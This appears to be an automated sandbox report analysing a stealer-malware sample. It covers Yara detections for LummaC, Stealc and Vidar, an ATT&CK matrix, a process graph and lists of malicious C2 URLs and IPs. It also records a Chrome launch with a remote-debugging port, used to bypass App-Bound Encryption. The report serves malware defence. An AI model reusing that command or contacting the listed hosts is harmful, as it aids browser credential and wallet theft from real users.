                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXI
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQB
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeDirectory queried: number of queries: 1001
                                    Source: Yara matchFile source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000024.00000003.2395728481.0000000001508000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000041.00000003.2682807652.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4847583445.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4847052772.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4847277082.000000000098A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000041.00000003.2674898719.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1600078469.0000000001915000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000024.00000003.2424648787.0000000001509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000002.2212351037.0000000000FC4000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000024.00000003.2389530571.0000000001504000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1601767639.0000000001918000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: EdYEXasNiR.exe PID: 6464, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 64252d274d.exe PID: 7584, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 696689ce6d.exe PID: 1072, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: jyidkjkfhjawd.exe PID: 7064, type: MEMORYSTR

                                    Remote Access Functionality

                                    barindex
                                    Attempt to bypass Chrome Application-Bound Encryption
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    Yara detected LummaC Stealer
                                    Source: Yara matchFile source: Process Memory Space: 64252d274d.exe PID: 7584, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 696689ce6d.exe PID: 1072, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: EdYEXasNiR.exe PID: 6464, type: MEMORYSTR
                                    Yara detected Stealc
                                    Source: Yara matchFile source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000003.00000002.2212351037.0000000000EF1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                    Yara detected Vidar stealer
                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C540C40 sqlite3_bind_zeroblob,3_2_6C540C40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C540D60 sqlite3_bind_parameter_name,3_2_6C540D60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C468EA0 sqlite3_clear_bindings,3_2_6C468EA0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C540B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,3_2_6C540B40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C466410 bind,WSAGetLastError,3_2_6C466410
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,3_2_6C46C050
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C466070 PR_Listen,3_2_6C466070
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46C030 sqlite3_bind_parameter_count,3_2_6C46C030
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4660B0 listen,WSAGetLastError,3_2_6C4660B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3F22D0 sqlite3_bind_blob,3_2_6C3F22D0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4663C0 PR_Bind,3_2_6C4663C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C469400 sqlite3_bind_int64,3_2_6C469400
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4694C0 sqlite3_bind_text,3_2_6C4694C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4694F0 sqlite3_bind_text16,3_2_6C4694F0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C469480 sqlite3_bind_null,3_2_6C469480
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4692E0 sqlite3_bind_double,3_2_6C4692E0

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts121
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		2
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Ingress Tool Transfer                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		1
                                    Extra Window Memory Injection                                    		11
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory23
                                    File and Directory Discovery                                    		Remote Desktop Protocol41
                                    Data from Local System                                    		2
                                    Encrypted Channel                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Exploitation for Client Execution                                    		11
                                    Scheduled Task/Job                                    		112
                                    Process Injection                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager2410
                                    System Information Discovery                                    		SMB/Windows Admin Shares11
                                    Email Collection                                    		1
                                    Remote Access Software                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts2
                                    Command and Scripting Interpreter                                    		111
                                    Registry Run Keys / Startup Folder                                    		11
                                    Scheduled Task/Job                                    		12
                                    Software Packing                                    		NTDS11
                                    Query Registry                                    		Distributed Component Object ModelInput Capture1
                                    Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud Accounts11
                                    Scheduled Task/Job                                    		Network Logon Script111
                                    Registry Run Keys / Startup Folder                                    		1
                                    Timestomp                                    		LSA Secrets1171
                                    Security Software Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable Media3
                                    PowerShell                                    		RC ScriptsRC Scripts1
                                    DLL Side-Loading                                    		Cached Domain Credentials2
                                    Process Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Extra Window Memory Injection                                    		DCSync561
                                    Virtualization/Sandbox Evasion                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                    Masquerading                                    		Proc Filesystem1
                                    Application Window Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt561
                                    Virtualization/Sandbox Evasion                                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                                    Process Injection                                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582828 Sample: EdYEXasNiR.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 233 Found malware configuration 2->233 235 Malicious sample detected (through community Yara rule) 2->235 237 Antivirus detection for URL or domain 2->237 239 27 other signatures 2->239 13 skotes.exe 2->13         started        18 EdYEXasNiR.exe 2 2->18         started        20 f3d6f9fcfe.exe 2->20         started        22 3 other processes 2->22 process3 dnsIp4 197 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 13->197 199 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 13->199 167 C:\Users\user\AppData\...\4c4716526e.exe, PE32+ 13->167 dropped 169 C:\Users\user\AppData\...\ad25d67005.exe, PE32 13->169 dropped 171 C:\Users\user\AppData\...\0bf9323d7e.exe, PE32 13->171 dropped 177 31 other malicious files 13->177 dropped 293 Creates multiple autostart registry keys 13->293 295 Hides threads from debuggers 13->295 297 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->297 24 0fb12e043c.exe 13->24         started        28 cbfb8a9c89.exe 13->28         started        31 696689ce6d.exe 13->31         started        41 3 other processes 13->41 201 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 18->201 203 104.21.32.1 CLOUDFLARENETUS United States 18->203 173 C:\Users\user\...\DX0TGIT2LZWIIEDZ8Y3A15R.exe, PE32 18->173 dropped 175 C:\Users\...\456YTTQ213T2RO9QAEYSNNZDL.exe, PE32 18->175 dropped 299 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->299 301 Query firmware table information (likely to detect VMs) 18->301 303 Found many strings related to Crypto-Wallets (likely being stolen) 18->303 307 4 other signatures 18->307 33 DX0TGIT2LZWIIEDZ8Y3A15R.exe 36 18->33         started        35 456YTTQ213T2RO9QAEYSNNZDL.exe 4 18->35         started        37 cmd.exe 20->37         started        39 conhost.exe 20->39         started        305 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 22->305 43 3 other processes 22->43 file5 signatures6 process7 dnsIp8 149 C:\Users\user\AppData\Local\...\win32ui.pyd, PE32 24->149 dropped 151 C:\Users\user\AppData\...\win32trace.pyd, PE32 24->151 dropped 153 C:\Users\user\AppData\...\win32process.pyd, PE32 24->153 dropped 161 24 other files (17 malicious) 24->161 dropped 243 Found pyInstaller with non standard icon 24->243 185 140.82.121.3 GITHUBUS United States 28->185 187 185.199.110.133 FASTLYUS Netherlands 28->187 155 C:\wOXcVegx\jyidkjkfhjawd.exe, PE32 28->155 dropped 245 Multi AV Scanner detection for dropped file 28->245 259 2 other signatures 28->259 45 jyidkjkfhjawd.exe 28->45         started        59 3 other processes 28->59 189 172.67.157.254 CLOUDFLARENETUS United States 31->189 191 104.102.49.254 AKAMAI-ASUS United States 31->191 247 Query firmware table information (likely to detect VMs) 31->247 249 Tries to steal Mail credentials (via file / registry access) 31->249 261 2 other signatures 31->261 193 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 33->193 195 127.0.0.1 unknown unknown 33->195 157 C:\Users\user\Documents\HJEHIJEBKE.exe, PE32 33->157 dropped 163 13 other files (9 malicious) 33->163 dropped 251 Detected unpacking (changes PE section rights) 33->251 253 Attempt to bypass Chrome Application-Bound Encryption 33->253 255 Drops PE files to the document folder of the user 33->255 263 7 other signatures 33->263 49 cmd.exe 33->49         started        61 2 other processes 33->61 159 C:\Users\user\AppData\Local\...\skotes.exe, PE32 35->159 dropped 265 3 other signatures 35->265 51 skotes.exe 35->51         started        53 cmd.exe 37->53         started        165 3 other files (1 malicious) 41->165 dropped 257 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 41->257 267 2 other signatures 41->267 55 64252d274d.exe 41->55         started        63 3 other processes 41->63 57 cmd.exe 43->57         started        file9 signatures10 process11 dnsIp12 205 104.21.18.19 CLOUDFLARENETUS United States 45->205 269 Detected unpacking (changes PE section rights) 45->269 271 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 45->271 273 Query firmware table information (likely to detect VMs) 45->273 289 4 other signatures 45->289 65 HJEHIJEBKE.exe 49->65         started        79 2 other processes 49->79 275 Creates HTML files with .exe extension (expired dropper behavior) 51->275 277 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 51->277 279 Tries to evade debugger and weak emulator (self modifying code) 51->279 291 2 other signatures 51->291 68 f3d6f9fcfe.exe 53->68         started        71 conhost.exe 53->71         started        207 188.114.96.3 CLOUDFLARENETUS European Union 55->207 281 Tries to steal Crypto Currency Wallets 55->281 73 f3d6f9fcfe.exe 57->73         started        75 conhost.exe 57->75         started        283 Loading BitLocker PowerShell Module 59->283 81 2 other processes 59->81 209 192.168.2.11 unknown unknown 61->209 211 239.255.255.250 unknown Reserved 61->211 285 Monitors registry run keys for changes 61->285 83 2 other processes 61->83 287 Uses schtasks.exe or at.exe to add and modify task schedules 63->287 77 cmd.exe 63->77         started        signatures13 process14 dnsIp15 225 Detected unpacking (changes PE section rights) 65->225 227 Tries to evade debugger and weak emulator (self modifying code) 65->227 229 Hides threads from debuggers 65->229 231 2 other signatures 65->231 141 C:\Users\user\AppData\Local\Temp\...\F9BD.bat, ISO-8859 68->141 dropped 86 cmd.exe 68->86         started        89 cmd.exe 73->89         started        91 f3d6f9fcfe.exe 77->91         started        93 conhost.exe 77->93         started        179 142.250.181.238 GOOGLEUS United States 83->179 181 142.250.184.228 GOOGLEUS United States 83->181 183 7 other IPs or domains 83->183 file16 signatures17 process18 file19 143 C:\Temp\3GEgnMlRi.txt, HTML 86->143 dropped 145 C:\Temp\.gif, HTML 86->145 dropped 95 mshta.exe 86->95         started        98 cmd.exe 86->98         started        100 cmd.exe 86->100         started        110 2 other processes 86->110 147 C:\Temp\5ZycQXqae.txt, HTML 89->147 dropped 102 mshta.exe 89->102         started        104 cmd.exe 89->104         started        106 cmd.exe 89->106         started        112 2 other processes 89->112 108 cmd.exe 91->108         started        process20 signatures21 309 Suspicious powershell command line found 95->309 311 Tries to download and execute files (via powershell) 95->311 114 powershell.exe 95->114         started        117 powershell.exe 98->117         started        120 powershell.exe 100->120         started        122 powershell.exe 102->122         started        124 powershell.exe 104->124         started        126 powershell.exe 106->126         started        process22 file23 139 C:\Users\...\483d2fa8a0d53818306efeb32d3.exe, PE32 114->139 dropped 128 483d2fa8a0d53818306efeb32d3.exe 114->128         started        131 conhost.exe 114->131         started        241 Powershell drops PE file 117->241 133 483d2fa8a0d53818306efeb32d3.exe 122->133         started        135 conhost.exe 122->135         started        signatures24 process25 signatures26 213 Detected unpacking (changes PE section rights) 128->213 215 Tries to detect sandboxes and other dynamic analysis tools (window names) 128->215 217 Tries to evade debugger and weak emulator (self modifying code) 128->217 137 Conhost.exe 128->137         started        219 Hides threads from debuggers 133->219 221 Tries to detect sandboxes / dynamic malware analysis system (registry check) 133->221 223 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 133->223 process27

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    EdYEXasNiR.exe57%VirustotalBrowse
                                    EdYEXasNiR.exe100%AviraTR/Crypt.XPACK.Gen
                                    EdYEXasNiR.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe100%AviraTR/ATRAPS.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe100%AviraTR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe100%AviraTR/Crypt.TPM.Gen
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exe100%AviraHEUR/AGEN.1320706
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exe100%Joe Sandbox ML
                                    C:\ProgramData\freebl3.dll0%ReversingLabs
                                    C:\ProgramData\mozglue.dll0%ReversingLabs
                                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                                    C:\ProgramData\nss3.dll0%ReversingLabs
                                    C:\ProgramData\softokn3.dll0%ReversingLabs
                                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\freebl3[1].dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\mozglue[1].dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\msvcp140[1].dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\nss3[1].dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe57%ReversingLabsWin32.Trojan.Pantera
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\softokn3[1].dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcruntime140[1].dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\eO7MwvK[1].exe8%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe8%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[3].exe8%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exe95%ReversingLabsWin32.Trojan.LummaStealer
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exe9%ReversingLabs
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exe30%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exe48%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exe96%ReversingLabsWin32.Trojan.LummaC
                                    C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe57%ReversingLabsWin32.Trojan.Pantera
                                    C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe30%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                    C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe95%ReversingLabsWin32.Trojan.LummaStealer
                                    C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe48%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe9%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe8%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exe8%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe96%ReversingLabsWin32.Trojan.LummaC
                                    C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exe8%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\msvcp140.dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ucrtbase.dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_ctypes.pyd0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pyd0%ReversingLabs

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    https://lev-tolstoi.com:443/apiDH100%Avira URL Cloudmalware
                                    https://framekgirus.shop/al100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/(100%Avira URL Cloudmalware
                                    https://rapeflowwj.lat/f100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/3100%Avira URL Cloudmalware
                                    https://framekgirus.shop:443/api100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/apiS100%Avira URL Cloudmalware
                                    https://framekgirus.shop/N100%Avira URL Cloudmalware
                                    https://framekgirus.shop/P100%Avira URL Cloudmalware
                                    https://framekgirus.shop/4100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/api$100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/((100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/api#100%Avira URL Cloudmalware
                                    https://energyaffai.lat/api100%Avira URL Cloudmalware
                                    http://185.215.113.206/c4becf79229cb002.phpAZ100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/apibv100%Avira URL Cloudmalware
                                    https://lev-tolstoi.com:443/apiCG100%Avira URL Cloudmalware
                                    https://lev-tolstoi.com/apilg100%Avira URL Cloudmalware
                                    https://framekgirus.shop/#100%Avira URL Cloudmalware
                                    http://185.215.113.43/Zu7JuNko/index.php7100%Avira URL Cloudmalware
                                    https://lev-tolstoi.com/oN100%Avira URL Cloudmalware
                                    http://185.215.113.43/Zu7JuNko/index.phpncodedS100%Avira URL Cloudmalware
                                    https://rapeflowwj.lat/z100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/H100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/X100%Avira URL Cloudmalware
                                    https://pancakedipyps.click/E100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

                                    No contacted domains info

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    fancywaxxers.shopfalse
                                      		high
                                      rabidcowse.shopfalse
                                        		high
                                        nearycrepso.shopfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
